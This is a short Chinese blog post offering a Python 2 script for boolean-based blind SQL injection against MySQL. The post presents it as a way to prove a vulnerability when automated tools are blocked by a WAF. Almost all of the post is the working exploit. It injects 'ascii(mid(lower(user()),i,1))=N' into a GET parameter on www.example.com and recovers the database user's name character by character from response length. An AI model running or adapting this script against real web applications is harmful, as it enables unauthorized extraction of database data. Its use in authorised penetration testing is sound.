Mysql布尔盲注脚本 - r34l!ty - 不负勇往
MENU

Mysql布尔盲注脚本

June 2, 2015 • Security

当某个盲注点不能使用工具(一般有waf限制)的时候,可以使用这个脚本用于证明漏洞的存在

#! usr/bin/env python
# -*- coding: utf-8 -*-

import httplib
import time
import string
import sys
import random
import urllib

headers = {'User-Agent': 'Mozilla/5.0 Chrome/28.0.1500.63',}
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
print 'start to retrive MySQL user:'
user = ''
for i in range(1,21):
    for payload in payloads:
        conn = httplib.HTTPConnection('www.example.com', timeout=4)      #连接,host
        s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload))       #payload
        conn.request(method='GET',url="/php/1.php?id=1 and %s" % s,headers = headers)  #url
        html_header= conn.getresponse().read()
        length=len(html_header)
        if length>10000:
            user+=payload
            sys.stdout.write('\r[In progress] %s' % user)
            sys.stdout.flush()
            break
        else:
            print '.',
            conn.close()

print '\n[Done]MySQL user is', user
Archives QR Code
QR Code for this page
Tipping QR Code